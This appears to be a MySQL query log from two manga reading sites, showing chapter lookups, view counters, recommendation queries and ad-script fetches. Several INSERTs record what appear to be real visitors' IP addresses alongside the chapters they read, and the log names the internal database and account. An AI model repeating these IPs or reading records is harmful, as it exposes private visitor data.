330659329 Query select * FROM chapters where id = '4616' 330659329 Quit 330659330 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659330 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4616' and m.active = 1 330659330 Quit 330659331 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659331 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '4616', '47.79.206.64', 'mangaberri.com', '2026-02-26 03:30:02', '2026-02-26 03:30:02') 330659331 Quit 330659332 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659332 Query select * FROM chapter_images where chapter_id = '4616' 330659332 Quit 330659333 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659333 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330659333 Quit 330659334 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659334 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330659334 Quit 330659335 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659336 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659335 Quit 330659336 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659336 Quit 330659337 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659338 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659337 Quit 330659338 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659338 Quit 330659339 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659340 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659339 Quit 330659340 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659340 Quit 330659341 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659342 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659341 Quit 330659342 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659342 Quit 330659343 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659344 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659343 Quit 330659344 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11531' and m.active = 1 330659344 Quit 330659345 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659345 Query select * FROM chapters where id = '11531' 330659345 Quit 330659346 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659346 Query select * FROM chapters where manga_id = '248' order by display_priority ASC, id desc 330659346 Quit 330659347 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659347 Query Update chapters set view=view+1 where id = '11531' 330659347 Quit 330659348 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659348 Query select * FROM chapters where id = '11531' 330659348 Quit 330659349 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659349 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11531' and m.active = 1 330659349 Quit 330659350 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659350 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('248', '11531', '47.79.207.12', 'mangaberri.com', '2026-02-26 03:30:02', '2026-02-26 03:30:02') 330659350 Quit 330659351 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659351 Query select * FROM chapter_images where chapter_id = '11531' 330659351 Quit 330659352 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659352 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '248' and m.active = 1 330659352 Quit 330659353 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659353 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='248' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Manhwa/Manhua%' OR genres like '%Martial Arts%') ORDER BY RAND() limit 10 330659353 Quit 330659354 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659355 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659354 Quit 330659355 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659355 Quit 330659356 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659357 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659356 Quit 330659357 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659357 Quit 330659358 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659359 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659359 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659359 Quit 330659358 Quit 330659360 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659361 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659360 Quit 330659361 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659361 Quit 260225 19:30:03 330659362 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659363 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659363 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1320' and m.active = 1 330659362 Quit 330659363 Quit 330659364 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659364 Query select * FROM chapters where id = '1320' 330659364 Quit 330659365 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659365 Query select * FROM chapters where manga_id = '59' order by display_priority ASC, id desc 330659365 Quit 330659366 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659366 Query Update chapters set view=view+1 where id = '1320' 330659366 Quit 330659367 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659367 Query select * FROM chapters where id = '1320' 330659367 Quit 330659368 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659368 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1320' and m.active = 1 330659368 Quit 330659369 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659369 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('59', '1320', '104.249.72.8', 'mangaberri.com', '2026-02-26 03:30:03', '2026-02-26 03:30:03') 330659369 Quit 330659370 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659370 Query select * FROM chapter_images where chapter_id = '1320' 330659370 Quit 330659371 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659371 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '59' and m.active = 1 330659371 Quit 330659372 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659372 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='59' and m.active = 1 AND (genres like '%Action%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330659373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659372 Quit 330659374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659374 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12931' 330659373 Quit 330659375 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659374 Quit 330659377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659376 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659375 Quit 330659377 Query select * FROM chapters where id = '12931' 330659376 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659376 Quit 330659377 Quit 330659378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659378 Query select * FROM chapters where manga_id = '64' order by id desc 330659379 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659380 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659379 Quit 330659380 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659380 Quit 330659381 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659382 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659381 Quit 330659382 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659382 Quit 330659383 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659384 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659383 Quit 330659384 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659384 Quit 330659378 Quit 330659385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659385 Query Update chapters set view=view+1 where id = '12931' 330659385 Quit 330659386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659386 Query select * FROM chapters where id = '12931' 330659386 Quit 330659387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659387 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12931' 330659387 Quit 330659388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659388 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('64', '12931', '180.73.103.235', 'mangacherri.com', '2026-02-26 03:30:03', '2026-02-26 03:30:03') 330659388 Quit 330659389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659389 Query select * FROM chapter_images where chapter_id = '12931' 330659389 Quit 330659390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659390 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '64' and m.active = 1 330659390 Quit 330659391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659391 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='64' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330659392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659392 Quit 330659393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659393 Quit 330659394 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11658' and m.active = 1 330659394 Quit 330659395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659395 Query select * FROM chapters where id = '11658' 330659395 Quit 330659396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659396 Query select * FROM chapters where manga_id = '274' order by display_priority ASC, id desc 330659396 Quit 330659397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659397 Query Update chapters set view=view+1 where id = '11658' 330659397 Quit 330659398 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659398 Query select * FROM chapters where id = '11658' 330659398 Quit 330659399 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659399 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11658' and m.active = 1 330659399 Quit 330659400 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659400 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('274', '11658', '66.208.12.146', 'mangaberri.com', '2026-02-26 03:30:03', '2026-02-26 03:30:03') 330659400 Quit 330659401 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659401 Query select * FROM chapter_images where chapter_id = '11658' 330659401 Quit 330659402 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659402 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '274' and m.active = 1 330659402 Quit 330659403 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659403 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='274' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Fantasy%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330659403 Quit 330659404 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659405 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659404 Quit 330659405 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659405 Quit 330659406 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659407 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659406 Quit 330659407 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659407 Quit 330659408 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659409 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659408 Quit 330659409 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659409 Quit 330659410 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659410 Quit 330659411 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659411 Quit 260225 19:30:04 330659412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659412 Quit 330659413 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '13965' 330659413 Quit 330659414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659414 Query select * FROM chapters where id = '13965' 330659414 Quit 330659415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659415 Query select * FROM chapters where manga_id = '268' order by id desc 330659415 Quit 330659416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659416 Query Update chapters set view=view+1 where id = '13965' 330659416 Quit 330659417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659417 Query select * FROM chapters where id = '13965' 330659417 Quit 330659418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659418 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '13965' 330659418 Quit 330659419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659419 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('268', '13965', '188.70.8.80', 'mangacherri.com', '2026-02-26 03:30:04', '2026-02-26 03:30:04') 330659419 Quit 330659420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659420 Query select * FROM chapter_images where chapter_id = '13965' 330659391 Quit 330659421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659421 Quit 330659422 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659422 Quit 330659423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659423 Quit 330659424 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659424 Quit 330659425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659425 Quit 330659426 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659426 Quit 330659427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659427 Quit 330659428 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659428 Quit 330659420 Quit 330659429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659429 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '268' and m.active = 1 330659429 Quit 330659430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659430 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='268' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330659431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659431 Quit 330659432 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12342' 330659432 Quit 330659433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659433 Query select * FROM chapters where id = '12342' 330659433 Quit 330659434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659434 Query select * FROM chapters where manga_id = '236' order by id desc 330659434 Quit 330659435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659435 Query Update chapters set view=view+1 where id = '12342' 330659435 Quit 330659436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659436 Query select * FROM chapters where id = '12342' 330659436 Quit 330659437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659437 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12342' 330659437 Quit 330659438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659438 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('236', '12342', '93.42.27.19', 'mangacherri.com', '2026-02-26 03:30:04', '2026-02-26 03:30:04') 330659438 Quit 330659439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659439 Query select * FROM chapter_images where chapter_id = '12342' 330659439 Quit 330659440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659440 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '236' and m.active = 1 330659440 Quit 330659441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659441 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='236' and m.active = 1 AND (genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330659430 Quit 330659442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659442 Quit 330659443 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659443 Quit 330659444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659444 Quit 330659445 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659445 Quit 330659446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659446 Quit 330659447 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659447 Quit 330659448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659448 Quit 330659449 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659449 Quit 330659441 Quit 330659450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659450 Quit 330659451 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659451 Quit 330659452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659452 Quit 330659453 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659453 Quit 330659454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659454 Quit 330659455 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659455 Quit 330659456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659456 Quit 330659457 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659457 Quit 330659458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659458 Quit 330659459 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12938' 330659459 Quit 330659460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659460 Query select * FROM chapters where id = '12938' 330659460 Quit 330659461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659461 Query select * FROM chapters where manga_id = '64' order by id desc 330659461 Quit 330659462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659462 Query Update chapters set view=view+1 where id = '12938' 330659462 Quit 330659463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659463 Query select * FROM chapters where id = '12938' 330659463 Quit 330659464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659464 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12938' 330659464 Quit 330659465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659465 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('64', '12938', '104.151.59.210', 'mangacherri.com', '2026-02-26 03:30:04', '2026-02-26 03:30:04') 330659465 Quit 330659466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659466 Query select * FROM chapter_images where chapter_id = '12938' 330659466 Quit 330659467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659467 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '64' and m.active = 1 330659467 Quit 330659468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659468 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='64' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:30:05 330659469 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659470 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659469 Quit 330659470 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '349' and m.active = 1 330659470 Quit 330659471 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659471 Query select * FROM chapters where id = '349' 330659471 Quit 330659472 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659472 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330659472 Quit 330659473 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659473 Query Update chapters set view=view+1 where id = '349' 330659473 Quit 330659474 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659474 Query select * FROM chapters where id = '349' 330659474 Quit 330659475 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659475 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '349' and m.active = 1 330659475 Quit 330659476 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659476 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '349', '107.77.206.202', 'mangaberri.com', '2026-02-26 03:30:05', '2026-02-26 03:30:05') 330659476 Quit 330659477 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659477 Query select * FROM chapter_images where chapter_id = '349' 330659477 Quit 330659478 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659478 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330659478 Quit 330659479 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659479 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330659479 Quit 330659480 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659481 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659480 Quit 330659481 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330659481 Quit 330659482 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659483 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659482 Quit 330659483 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330659483 Quit 330659484 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659485 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330659484 Quit 330659485 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order 